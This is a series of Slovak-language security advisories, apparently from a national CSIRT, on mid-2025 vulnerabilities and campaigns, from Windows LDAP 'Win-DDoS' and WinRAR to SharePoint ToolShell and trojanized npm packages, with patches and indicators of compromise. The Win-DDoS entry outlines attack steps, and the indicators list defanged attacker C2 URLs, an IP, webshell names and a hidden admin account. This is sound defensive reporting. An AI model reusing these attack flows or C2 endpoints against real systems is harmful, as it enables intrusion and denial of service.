Možné škody:

Vzdialené vykonávanie kódu (RCE)
Server-Side Request Forgery (SSRF)
Neoprávnené prechádzanie adresárovej štruktúry
Únik citlivých údajov
Úplne narušenie dôveryhodnosti služby

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na FreeFlow Core verziu 8.0.5 dostupnú na stránke výrobcu, ktorá obsahuje opravy pre obe zraniteľnosti.

Navyše odporúčame implementovať striktné overovanie vstupov ako zakázanie spracovávania externého XML kódu či súborov, okrem tých zo zoznamu povolených položiek (whitelist).

Zdroje:

Win-DDoS: Nová technika distribuovaného narušenia dostupnosti služby

Marian Danko — Tue, 12 Aug 2025 12:52:01 +0000

Bezpečnostní výskumníci zverejnili na stretnutí DEF CON 33 informácie o zraniteľnosti CVE-2025-32724, ktorá ohrozuje verejne dostupné doménové radiče dosiahnuteľné z internetu. Tie sa vedia efektívne zmeniť na obete, a tiež botov vyvolávajúcich narušenie dostupnosti služby. Zraniteľnosť má povahu zero-click a dovoľuje útočníkovi spôsobiť narušenie služby bez nákladnej alebo špecializovanej sady nástrojov.

Zraniteľné systémy:

Windows doménové radiče so službou Active Directory Domain Service

Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)

Opis zraniteľností:

CVE-2025-32724 (CVSS 3.1 skóre 7,5)

Klientsky kód LDAP nemal žiadne limity na veľkosť zoznamov referral a uvoľňoval pamäť až po dokončení celého procesu. Exploit Win-DDoS zneužíva tieto vlastnosti na manipuláciu URL dopytov na nasmerovanie doménového radiča na server obete.

Útočník pošle volanie RPC na doménové radiče, ktoré ich prinúti stať sa CLDAP klientmi.
DC pošlú požiadavku CLDAP na útočníkov CLDAP server, ktorý vráti odpoveď s odkazom (referral response).
DC pošlú dopyt LDAP na LDAP server útočníka cez protokol TCP.
Útočníkov LDAP server odpovie dlhým zoznamom LDAP referenčných URL adries, ktoré všetky smerujú na IP adresu obete.
DC opakovane posielajú dopyty LDAP na daný port, čím zahltia cieľový server.

Doménové radiče sa domnievajú, že vykonávajú legitímne dopyty LDAP ale v skutočnosti zahlcujú server obete opakovanými požiadavkami.

Technicky podobné sú aj zraniteľnosti CVE-2025-26673 (CVSS 3.1 skóre 7,5), CVE-2025-49716 (CVSS 3.1 skóre 7,5) a CVE-2025-49722 (CVSS 3.1 skóre 5,7).

Možné škody:

Zneprístupnenie služby (DoS)

Odporúčania:

Administrátorom zraniteľných systémov odporúčame bezodkladne vykonať aktualizácie vydané 10. júna. Konkrétne na:

Windows Server 2016 Security Update 10.0.14393.8148
Windows 10 Version 1607 for x64-based Systems Security Update 10.0.14393.8148
Windows 10 Version 1607 for 32-bit Systems Security Update 10.0.14393.8148
Windows 10 for x64-based Systems Security Update 10.0.10240.21034
Windows 10 for 32-bit Systems Security Update 10.0.10240.21034
Windows Server 2025Security Update 10.0.26100.4349
Windows Server 2025SecurityHotpatchUpdate 10.0.26100.4270
Windows 11 Version 24H2 for x64-based Systems Security Update 10.0.26100.4349
Windows 11 Version 24H2 for x64-based Systems SecurityHotpatchUpdate 10.0.26100.4270
Windows 11 Version 24H2 for ARM64-based Systems Security Update10.0.26100.4349
Windows 11 Version 24H2 for ARM64-based Systems SecurityHotpatchUpdate 10.0.26100.4270
Windows Server 2012 R2 (Server Core installation) Monthly Rollup 6.3.9600.22620
Windows Server 2012 R2 Monthly Rollup 6.3.9600.22620
Windows Server 2012 (Server Core installation)Monthly Rollup6.2.9200.25522
Windows Server 2012Monthly Rollup6.2.9200.25522
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Monthly Rollup6.1.7601.27769
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Security Only6.1.7601.27769
Windows Server 2008 R2 for x64-based Systems Service Pack 1Monthly Rollup6.1.7601.27769
Windows Server 2008 R2 for x64-based Systems Service Pack 1Security Only6.1.7601.27769
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Monthly Rollup6.0.6003.23351
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)Security Only6.0.6003.23351
Windows Server 2008 for x64-based Systems Service Pack 2Monthly Rollup6.0.6003.23351
Windows Server 2008 for x64-based Systems Service Pack 2Security Only6.0.6003.23351
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Monthly Rollup6.0.6003.23351
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)Security Only6.0.6003.23351
Windows Server 2022, 23H2 Edition (Server Core installation)Security Update10.0.25398.1665
Windows 11 Version 23H2 for x64-based Systems Security Update10.0.22631.5472
Windows 11 Version 23H2 for ARM64-based Systems Security Update10.0.22631.5472
Windows Server 2025 (Server Core installation)Security Update10.0.26100.4349
Windows Server 2025 (Server Core installation)SecurityHotpatchUpdate10.0.26100.4270
Windows 10 Version 22H2 for 32-bit Systems Security Update10.0.19045.5965
Windows 10 Version 22H2 for ARM64-based Systems Security Update10.0.19045.5965
Windows 10 Version 22H2 for x64-based Systems Security Update10.0.19045.5965
Windows 11 Version 22H2 for x64-based Systems Security Update10.0.22621.5472
Windows 11 Version 22H2 for ARM64-based Systems Security Update10.0.22621.5472
Windows 10 Version 21H2 for x64-based Systems Security Update10.0.19044.5965
Windows 10 Version 21H2 for ARM64-based Systems Security Update10.0.19044.5965
Windows 10 Version 21H2 for 32-bit Systems Security Update10.0.19044.5965
Windows Server 2022 (Server Core installation)Security Update10.0.20348.3807
Windows Server 2022 (Server Core installation)SecurityHotpatchUpdate10.0.20348.3745
Windows Server 2022Security Update10.0.20348.3807
Windows Server 2022SecurityHotpatchUpdate10.0.20348.3745
Windows Server 2019 (Server Core installation)Security Update10.0.17763.7434
Windows Server 2019Security Update10.0.17763.7434
Windows 10 Version 1809 for x64-based Systems Security Update10.0.17763.7434
Windows 10 Version 1809 for 32-bit Systems Security Update10.0.17763.7434

Pozn.: Aj zvyšné zraniteľnosti spomenuté v opise zraniteľností už majú dostupné bezpečnostné záplaty.

Zdroje:

Aktualizácia nástroja WinRAR opravila aktívne zneužívanú zero-day zraniteľnosť

Marian Danko — Tue, 12 Aug 2025 09:32:42 +0000

Vývojári archivačného nástroja WinRAR vydali bezpečnostnú aktualizáciu svojho produktu, ktorá opravuje závažnú bezpečnostnú zraniteľnosť CVE-2025-8088. Táto zraniteľnosť je často zneužívaná vo phishingových kampaniach na distribúciu škodlivého kódu.

Zraniteľné systémy:

WinRAR všetky verzie po 7.12 pre Windows
UnRAR 7.0 pre Windows

Opis zraniteľnosti:

CVE-2025-8088 (CVSS-B 4.0 skóre 8,4)

Závažná bezpečnostná zraniteľnosť umožňuje útočníkom vykonať neoprávnené prechádzanie adresármi, ktoré využívajú na rozbalenie škodlivého kódu do adresára „Startup“. Jeho obsah sa automaticky spustí s administratívnymi privilégiami pri ďalšom štarte počítača.

Zraniteľnosť objavili bezpečnostní výskumníci Anton Cherepanov, Peter Košinár a Peter Strýček zo spoločnosti ESET.

Možné škody:

Neoprávnený prístup do systému
Vykonanie škodlivého kódu

Odporúčania:

Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizáciu na verziu WinRAR 7.13. Pre nástroj príkazového riadka UnRAR v dobe publikácie článku, nie je zverejnený žiadny návod na mitigáciu.

Indikátory kompromitácie:

Odporúčame dôkladne prezrieť obsah adresára „Startup“ s adresou:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (Local to user)
%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp (Machine-wide)

Za pozornosť stoja súbory alebo odkazy s neznámym pôvodom alebo účelom pre daný systém.

Zdroje:

Kritická zraniteľnosť v kamerách od Axis Communications dovoľuje vzdialené vykonávanie kódu

Marian Danko — Mon, 11 Aug 2025 06:14:25 +0000

Bezpečnostní výskumníci z Claroty Team82 zverejnili informácie o zraniteľnostiach produktov spoločnosti Axis Communications z ktorých jedna CVE-2025-30023 je kritická a môže byť použitá na útok na serverovú aj klientskú stranu nasadených produktov.

Zraniteľné systémy:

Axis Camera Station Pro 6.9
Axis Camera Station 5.58
Axis Device Manager 5.32

Opis zraniteľnosti:

CVE-2025-30023 (CVSS 3.1 skóre 9.0)

Kritická bezpečnostná zraniteľnosť sa nachádza v proprietárnom protokole Axis.Remoting. Potenciálny vzdialený útočník môže úspešným zneužitím setu exploitov zraniteľností obísť autentifikáciu a získať prístup na úrovni systému.

Zraniteľnosti sú nebezpečné pre produkty ako Axis Device Manager, ktorý organizácie používajú na správu svojich zariadení Axis, ako aj k softvéru Axis Camera Station, ktorý umožňuje koncovým používateľom prístup k videoprenosu z kamier.

Pre proprietárny protokol sú potenciálne zraniteľné zariadenia ľahko vyhladateľné cez známe služby, ktoré skenujú internet. V deň, keď boli zraniteľnosti a ich oprava publikovaná sa na internete nachádzalo viac ako 6500 potenciálne zraniteľných zariadení.

Možné škody:

Vykonanie škodlivého kódu
Úplné narušenie dôvernosti, integrity a dostupnosti systému
Zníženie úrovne zabezpečenia objektu monitorovaného zraniteľnými zariadeniami

Odporúčania:

Administrátorom a používateľom odporúčame vykonať aktualizáciu zasiahnutých systémov na verzie:

AXIS Camera Station Pro 6.9
AXIS Camera Station 5.58
AXIS Device Manager 5.32

Zdroje:

Microsoft vydal usmernenie k závažnej zraniteľnosti v hybridných nasadeniach MS Exchange

Marian Danko — Fri, 08 Aug 2025 13:46:47 +0000

Spoločnosť Microsoft vydala usmernenie pre mitigáciu bezpečnostnej zraniteľnosti CVE-2025-53786 s vysokou závažnosťou pre svoj produkt MS Exchange. Zatiaľ nebolo detegované aktívne zneužívanie zraniteľnosti, avšak Microsoft varuje, že zneužitie je ťažko detekovateľné.

Zraniteľné systémy:

Microsoft Exchange Server Subscription Edition RTM hybridné prostredie
Microsoft Exchange Server 2019 hybridné prostredie
Microsoft Exchange Server 2016 hybridné prostredie

Opis zraniteľnosti:

CVE-2025-53786 (CVSS 3.1 skóre 8.0)

Bezpečnostná zraniteľnosť ovplyvňuje hybridné nasadenia servera Microsoft Exchange. Potenciálny útočník s prístupom k lokálnemu (on-premise) serveru MS Exchange s oprávneniami správcu môže eskalovať svoje oprávnenia v pripojenom cloudovom prostredí. Táto chyba existuje z dôvodu, že server Exchange Server a Exchange Online zdieľajú rovnakú identitu “service principal” v hybridných konfiguráciách. Úspešné zneužitie zraniteľnosti vedie k celkovej kompromitácií cloudového prostredia organizácie.

Microsoft upozorňuje, že služba „Shared service principal“ na ktorú sa vzťahuje aj aktuálna zraniteľnosť je zastaraná a bude vypnutá k 31.10.2025 a organizácie, ktoré dovtedy neprejdú na „Dedicated Exchange hybrid app“ stratia hybridnú funkcionalitu.

Možné škody:

Neoprávnený prístup k citlivým údajom
Kompromitácia cloudovej infraštruktúry organizácie
Nedostupnosť služieb (DoS)

Odporúčania:

Administrátorom odporúčame:

Aktualizovať produkt na najnovšiu verziu (hotfix) (návod)
Postupovať podľa zmien v nasadení hybridných prostredí (návod)
Nasadiť vyhradenú hybridnú aplikáciu Exchange (návod)
Resetovať „keyCredentials“ služby Service principal (návod)

Zdroje

Zero-day zraniteľnosti v produkte Adobe Experience Manager Forms on JEE

Marian Danko — Thu, 07 Aug 2025 10:33:02 +0000

Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoj produkt Adobe Experience Manager (AEM) Forms on JEE, ktoré opravujú dve kritické zero-day zraniteľnosti. Zraniteľnosti možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Adobe Experience Manager (AEM) Forms on JEE vo verziách starších ako 6.5.0-0108

Opis zraniteľnosti:

CVE-2025-54253 (CVSS skóre 10,0)

Kritická zraniteľnosť spočíva miskonfigurácii administratívneho rozhrania, ktorá ponecháva aktívny vývojársky režim Struts. Zraniteľnosť možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

CVE-2025-54254 (CVSS skóre 8,6)

Zraniteľnosť spočíva v nesprávnej reštrikcii externých referencií v rámci spracovávaných XML dokumentov. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu XXE (XML External Entity) útokov a čítanie obsahu súborov na súborovom systéme.

Pozn.: Na uvedené zraniteľnosti je v súčasnosti dostupný tzv. Proof of Concept kód demonštrujúci návod ich zneužitia.

Bližšie informácie o zraniteľnostiach môžete nájsť na stránkach bezpečnostných výskumníkov zo spoločnosti Searchlight Cyber, ktorí predmetnú zraniteľnosť objavili.

Možné škody:

Vykonanie škodlivého kódu
Neoprávnený prístup k citlivým údajom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu AEM Forms on JEE na verziu 6.5.0-0108. Detailný návod na inštaláciu záplat v závislosti od používanej verzie produktu môžete nájsť online na stránke výrobcu.

Zdroje:

Vysoko závažná zraniteľnosť v Cursor AI IDE

Marian Danko — Thu, 07 Aug 2025 10:30:19 +0000

Vývojári AI editora kódu Cursor vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť. CVE-2025-54136 možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Cursor vo verziách starších ako 1.3

Opis zraniteľnosti:

CVE-2025-54136 (CVSS 3.1 skóre: 7,2)

Zraniteľnosť známa aj pod aliasom MCPoison spočíva v mechanizme spracovania zmien konfigurácie MCP (Model Context Protocol) serverov. Zraniteľnosť možno modifikáciou konfiguračných súborov na zariadení obete alebo v rámci používaných GitHub repozitárov zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom. Bližšie informácie o zraniteľnosti môžete nájsť online v analýze od spoločnosti CheckPoint.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a vývojárom odporúčame vykonať bezodkladnú aktualizáciu Cursor na verziu 1.3. Rovnako odporúčame limitovať spojenia len na dôveryhodné MCP servery.

Zdroje:

Google opravil aktívne zneužívané zraniteľnosti operačného systému Android

Marian Danko — Thu, 07 Aug 2025 10:27:04 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Andorid, ktoré opravujú 6 zraniteľností, z čoho 1 je označená ako kritická a 2 ako aktívne zneužívané. Aktívne zneužívané CVE-2025-21479 a CVE-2025-27038 v komponentoch Qualcomm možno zneužiť na poškodenie obsahu pamäte.

Zraniteľné systémy:

Zariadenia s operačným systémom Android bez aktualizácie z 05.08.2025

Opis zraniteľnosti:

Kritická zraniteľnosť:

CVE-2025-48530 (CVSS 3.1 skóre: 8,6)

Kritická zraniteľnosť sa nachádza v komponente System a možno ju zneužiť na vzdialené vykonanie kódu.

Aktívne zneužívané zraniteľnosti:

CVE-2025-21479 (CVSS 3.1 skóre: 8,6)

Nesprávnu autorizáciu v rámci komponentu Qualcomm Graphics možno zneužiť na neoprávnené vykonanie príkazov v mikrokóde GPU a následné poškodenie obsahu pamäte.

CVE-2025-27038 (CVSS 3.1 skóre: 7,5)

CVE-2025-27038 v Qualcomm Graphics spočíva v použití odalokovaného miesta v pamäti a možno ju zneužiť na poškodenie obsahu pamäte.

Ostatné zraniteľnosti:

Vysoko závažné zraniteľnosti v komponente Framework (CVE-2025-22441, CVE-2025-48533) možno zneužiť na eskaláciu privilégií. Zneužitie zraniteľností vyžaduje interakciu zo strany používateľa.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnená zmena v systéme

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú inštaláciu aktualizácií operačného systému Android z 5. augusta 2025.

Zdroje:

Kritická zraniteľnosť v JavaScript balíčku Node-SAML

Marian Danko — Mon, 04 Aug 2025 13:47:43 +0000

Vývojári knižnice Node-SAML vydali bezpečnostnú aktualizáciu svojho produktu, ktorá opravuje kritickú bezpečnostnú zraniteľnosť vo verifikáci kryptografických podpisov, čo môže spôsobiť neautorizovaný prístup k citlivým údajom.

Zraniteľné systémy:

Balíček Node-SAML všetky verzie do 5.0.1

Opis zraniteľnosti:

CVE-2025-54419 (CVSS 3.1 skóre 10.0)

Bezpečnostná zraniteľnosť spočíva v nedostatočnej implementácii bezpečnostných mechanizmov. Počas autentifikácie sú SAML odpovede digitálne podpísané poskytovateľom identity (IdP). V postihnutých verziách Node-SAML aplikácia načítava a dôveruje častiam SAML odpovede z nepodpísanej časti dokumentu, čím umožňuje vzdialenému, neautentifikovanému útočníkovi overenie digitálneho podpisu.

Možné škody:

Úplne narušenie dôveryhodnosti systému
Eskalácia privilégií
Neautorizovaný prístup k citlivým údajom

Odporúčania:

Administrátorom zraniteľnej verzie balíčku sa odporúča okamžitá aktualizácia na verziu 5.1.0 v ktorej je zraniteľnosť opravená.

Zdroje:

Kritická aktívne zneužívaná zraniteľnosť vo WordPress doplnku Alone

Marian Danko — Mon, 04 Aug 2025 13:19:54 +0000

WordPress webstránky využívajúce tému menom Alone, sú aktívne zneužívané na vzdialené vykonávanie škodlivého kódu cez kritickú zraniteľnosť. Toto zneužitie bolo detegované už vo viac ako 120 tisíc prípadoch.

Zraniteľné systémy:

Téma Alone všetky verzie po 7.8.3

Opis zraniteľností:

CVE-2025-5394 (CVSS 3.1 skóre 9.8)

Webstránky využívajúce túto tému sú napádané cez nevyžiadané nahrávanie súboru, kvôli chýbajúcej funkcionalite nonce overenia vo funkcii alone_import_pack_install_plugin(). Týmto umožňuje pluginu inštaláciu cez AJAX a akceptuje URL adresu vzdialeného zdroja v POST dátach, čo umožňuje neautentifikovaným používateľom spustiť sťahovanie doplnkov zo vzdialených URL adries. Toto je znežívané na sťahovanie zip archívov obsahujúcich škodlivý kód.

Možné škody:

Vzdialené vykonávanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Prevádzkovateľ témy Alone odporúča používateľom okamžitú aktualizáciu na verziu 7.8.5

Zdroje:

Upozorňujeme na phishingovú kampaň zneužívajúcu meno VŠZP

Marian Danko — Tue, 29 Jul 2025 14:04:06 +0000

VJ CSIRT upozorňuje na pretrvávajúce útoky, ktoré sú cielené na poistencov Všeobecnej zdravotnej poisťovne. Tieto útoky sú vykonávané formou phishingových e-mailov s podvodnými odkazmi.

Opis činnosti:

„Všeobecná zdravotná poisťovňa upozorňuje verejnosť na aktuálnu phishingovú kampaň, v rámci ktorej sa útočníci snažia zneužiť situáciu a dôveru poistencov. Podvodné e-maily informujú o údajnej „novej refundácii“ a obsahujú odkaz na falošnú webovú stránku, ktorá sa na oficiálnu stránku zdravotnej poisťovne podobá. V prípade, ak vám takýto e-mail prišiel, je dôležité neklikať na odkaz v ňom a neposkytovať osobné ani platobné údaje. Odosielateľom týchto e-mailových správ nie je Všeobecná zdravotná poisťovňa.“ – varuje VŠZP na svojom oficiálnom webe.

dizajn phishingovej stránky

Ako sa účinne brániť?

Voči phishingovým kampaniam je najúčinnejšia obrana zvyšovanie povedomia používateľov. Útoky stratia účinnosť, pokiaľ dokážu zamestnanci a používatelia identifikovať podvodné správy a zneužité služby. Na to slúžia okrem varovaní najmä školenia a preventívne phishingové testy, kde sa používatelia naučia na konkrétnych príkladoch a v praxi rozlišovať legitímny a škodlivý obsah (screenshoty, škodlivé odkazy, hlavné rozlišovacie znaky, a podobne).

Takéto cvičenia ponúkame online aj verejnosti na stránke: https://ctf.kyberakademia.sk/

Zdroje:

https://www.vszp.sk/o-nas/informacie-media/tlacove-spravy/vseobecna-zdravotna-poistovna-upozornuje-phisingovu-kampan-pozor-podvodne-emaily-neposkytujte-citlive-udaje.html

Škodlivý kód ukrytý do WordPress mu-plugins

Marian Danko — Thu, 24 Jul 2025 14:46:39 +0000

Útočníci v rámci techník skrývania škodlivého kódu využívajú zložku mu-plugins, ktorú používajú stránky na platforme WordPress pre načítanie automaticky aktivovaných modulov.

Zraniteľné systémy:

Webové stránky na platforme WordPress

Opis činnosti:

Výskumníci spoločnosti Sucuri upozorňujú na trend, kedy útočníci zneužívajú zložku mu-plugins na ukrývanie škodlivého kódu. Táto zložka, ktorej názov je skratkou slov „must-use plugins“, slúži webovým stránkam na platforme WordPress ako zdroj automaticky aktivovaných modulov. Moduly nie sú zobrazované v administrátorskom rozhraní, teda zložka poskytuje lepšiu možnosť vyhnúť sa detekcii.

Spoločnosť pozorovala niekoľko odlišných prípadov infekcií. Jedným z nich bol škodlivý súbor „wp-index.php“, ktorý volal z URL obfuskovanej jednoduchou šifrou ROT13 ďalšie štádium infekcie, ktoré umožnilo útočníkovi trvalý prístup k infikovanej webstránke a vzdialené vykonávanie kódu PHP. V iných prípadoch útočníci infikovali zložku mu-plugin kódom pre presmerovanie na falošnú aktualizačnú stránku, zámenu obsahu webstránky (obrázky s explicitným obsahom a odkazy), či pre vytvorenie webshell-u.

Možné škody:

Vzdialené vykonávanie kódu
Eskalácia oprávnení
Nedostupnosť služby (DoS)
Získanie úplnej kontroly nad systémom

Odporúčania:

Vykonajte audit nainštalovaných modulov v prípade, že ste tak ešte nevykonali, aktualizujte ich na najnovšie verzie. Správne nastavte oprávnenia pre operácie so súbormi webstránky. Zakážte zmeny v súbore wp-config.php ( define('DISALLOW_FILE_EDIT', true); ).

Indikátory kompromitácie:

Škodlivý súbor a cesta: wp-content/mu-plugins/wp-index.php
ROT13-kódované URL: str_rot13(‘uggcf://1870l4ee4l3q1x757673d.klm/peba.cuc’)
Dekódovaná URL: hxxps://1870y4rr4y3d1k757673q[.]xyz/cron.php
Databázový kľúč: _hdra_core
Dočasná cesta k payloadu: .sess-[hash].php v zložke pre nahrávanie súborov
Skrytý používateľ s oprávneniami správcu: officialwp

Odkazy:

https://blog.sucuri.net/2025/07/uncovering-a-stealthy-wordpress-backdoor-in-mu-plugins.html

https://blog.sucuri.net/2025/03/hidden-malware-strikes-again-mu-plugins-under-attack.html

Zraniteľná aplikácia ExpressVPN smeruje komunikáciu RDP mimo tunel

Marian Danko — Thu, 24 Jul 2025 12:45:19 +0000

ExpressVPN vo svojej poslednej aktualizácii opravila chybu, ktorá spôsobuje, že komunikácia vedúca cez Remote Desktop Protocol neprechádza VPN tunelom.

Zraniteľné systémy:

ExpressVPN Windows klient verzie 12.97 až 12.101.0.2-beta

Opis zraniteľnosti:

Verzia 12 klienta ExpressVPN pre Windows obsahuje bezpečnostnú chybu, ktorá za určitých okolností zapríčiňuje neanonymizovanú komunikáciu mimo VPN tunel. Jedná sa o dve konkrétne situácie, a to pripojenie cez RDP a TCP premávku smerovanú cez port 3389. Týmto spôsobom môže internetový poskytovateľ alebo iný účastník siete vidieť adresu servera na ktorý sa používateľ pripája.

Chybu, ktorá súvisí so zabudnutou, neodstránenou časťou kódu z testovacej verzie, objavil a nahlásil bezpečnostný analytik Adam-X.

Možné škody:

Úplné narušenie dôvernosti systému

Odporúčania:

Dodávateľ služby odporúča aktualizáciu na verziu 12.101.0.45 ktorá mimo iných úprav obsahuje záplatu transparentného pripojenia.

Zdroje:

Aktívne zneužívaná zraniteľnosť CrushFTP

Marian Danko — Tue, 22 Jul 2025 15:41:06 +0000

Vývojári FTP klienta CrushFTP vydali aktualizáciu pre novú zero-day zraniteľnosť, ktorá je aktívne zneužívaná. Útočníkom umožňuje získať administrátorský prístup ku zraniteľným zariadeniam.

Zraniteľné systémy:

CrushFTP 11.3.4_23 a vyššie
CrushFTP 10.8.5 a vyššie

Opis zraniteľnosti:

CVE-2025-54309(CVSS 3.1 skóre 9.0)

Pokiaľ je služba DMZ proxy zakázaná, zraniteľné verzie CrushFTP nevykonávajú správne AS2 validáciu a dovolia útočníkom obísť autentifikáciu a získať prístup k účtu správcu cez protokol HTTPS. Útočník pre jej zneužitie potrebuje odoslať špeciálne upravenú požiadavku cez rozhranie HTTPS.

Možné škody:

Obídenie bezpečnostných prvkov
Získanie úplnej kontroly nad systémom

Odporúčania:

Používateľom zraniteľných FTP klientov odporúčame okamžitú aktualizáciu na verzie CrushFTP 11.3.4_26 a CrushFTP 10.8.5_12. Pokiaľ nie je možné z produkčných dôvodov vykonať okamžitú aktualizáciu, odporúčame preventívne obnovenie pôvodnej (základnej) konfigurácie z čistých záloh, čím zvrátite prípadnú kompromitáciu aplikácie. Zálohy možno považovať za nekompromitované, ak sú vytvorené pred 16. júlom – vrátane.

Medzi už známe znaky napadnutých systémov podľa spoločnosti SOCRadar patria:

Zásahy do MainUsers/default/user.xml vrátane reťazca “last_logins“.
Neznáme účty správcov s dlhými identifikátormi ako napríklad: 7a0d26089ac528941bf8cb998d97f408m
Zmeny v rozhraní ako napríklad chýbajúce tlačidlá či iné grafické prvky.
Prihlásenia správcov systému z neznámych IP adries.
Zmeny v oprávneniach spravovania citlivých adresárov.

Zdroje:

Kompromitované balíčky NPM šíria malvér

Marian Danko — Mon, 21 Jul 2025 15:19:08 +0000

Správca open-source NPM balíčkov pre Node.js uviedol na svojej GitHub stránke varovanie, že sa stal obeťou phishingového útoku. Útočníci vymenili jeho balíčky za škodlivé.

Infikované balíčky:

eslint-config-prettier verzia 8.10.1, 9.1.1, 10.1.6, a 10.1.7.
eslint-plugin-prettier verzia 4.2.2 and 4.2.3.
synckit verzia 0.11.9
@pkgr/core verzia 0.2.8
napi-postinstall verzia 0.3.1

Opis útoku:

node-gyp.dll (c68e42f416f482d43653f36cd14384270b54b68d6496a8e34ce887687de5b441

node-gyp.dll)

Úspešný phishingový útok dovolil útočníkom získať prístup k NPM tokenu správcu balíčkov a vykonať útok na dodávateľský reťazec. Útočník zverejnil podvrhnuté verzie balíčkov eslint-config-prettier, eslint-plugin-prettier, synckit, @pkgr/core a napi-postinstall. Obsahujú poinštalačný skript s funkciou logDiskSpace(); ktorá sa pokúsi vykonať podvrhnutý trojanizovaný DLL súbor (node-gyp.dll), cez systémový proces rundll32.

Možné škody:

Únik citlivých informácií
Vzdialené vykonanie príkazov

Odporúčania:

Odporúčame okamžite odinštalovať infikované verzie balíčkov, verifikovať „lockfiles“: package-lock.json, pnpm-lock.yaml, bun.lock alebo yarn.lock či neobsahujú referencie na tieto súbory a kontrolovať CI logy po 18. júli na záznamy nevyžiadanej aktivity.

Zdroje:

Zero-day zraniteľnosti Microsoft SharePoint Server

Marian Danko — Mon, 21 Jul 2025 15:15:30 +0000

Spoločnosť Microsoft vydala bezpečnostné aktualizácie pre SharePoint Server, ktoré opravujú dve kritické aktívne zneužívané zraniteľnosti. CVE‑2025‑53770 a CVE‑2025‑53771 umožňujú vzdialené prevzatie kontroly nad servermi bez nutnosti prihlásenia. Chyby boli zneužité v útokoch proti desiatkam inštitúcií po celom svete.
[Aktualizované: 23.7.2025]

Zraniteľné systémy:

SharePoint Subscription Edition
SharePoint 2019
SharePoint 2016

Opis činnosti:

CVE-2025-53770 (CVSS skóre 9,8)

Kritická zraniteľnosť umožňuje neautorizovanému útočníkovi vzdialene vykonávať kód. Chyba súvisí s neošetrenou deserializáciou nedôveryhodných dát v lokálnej inštancii SharePoint Server.

CVE-2025-53771 (CVSS skóre 6,3)

Aktívne zneužívaná zraniteľnosť strednej závažnosti umožňuje autorizovanému útočníkov vykonávať útoky s falšovaním identity (spoofing) po sieti. Súvisí s nevhodnou kontrolou súborovej cesty k citlivým súborom.

Chyby boli zneužité v reálnych útokoch proti desiatkam vládnych, akademických a energetických inštitúcií po celom svete. Útočná kampaň bola nazvaná ToolShell.

Možné škody:

Vzdialené vykonanie kódu
Spoofing

Odporúčania:

Microsoft vyzýva administrátorov, aby bezodkladne aktualizovali SharePoint 2016 [KB5002759, KB5002760], SharePoint 2019 [KB5002753, KB5002754] a SharePoint Subscription Edition [KB5002768], zapli bezpečnostné funkcie ako AMSI a Defender AV, vymenili šifrovacie kľúče a preverili systémy na známky útoku. Pokiaľ nie je možné aktualizácie aplikovať, odporúča dočasne odpojiť servery z internetu alebo použiť dostupné ochranné opatrenia. Podrobný návod nájdete na oficiálnych stránkach [1, 2].

Indikátory kompromitácie:

Spinstall0.aspx (a variácie; webshell)
92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514 (SHA-256 súboru Spinstall0.aspx)
debug_dev.js (súbor s webovými konfiguračnými údajmi vrátane MachineKey)
c34718cbb4c6.ngrok-free[.]app/file.ps1 (URL pre tunel Ngrok pre spojenie s C2)
\1[5-6]\TEMPLATE\LAYOUTS\debug_dev.js (súborová cesta k ukradnutým webovým konfiguračným súborom)
131.226.2[.]6 (adresa C2 servera)
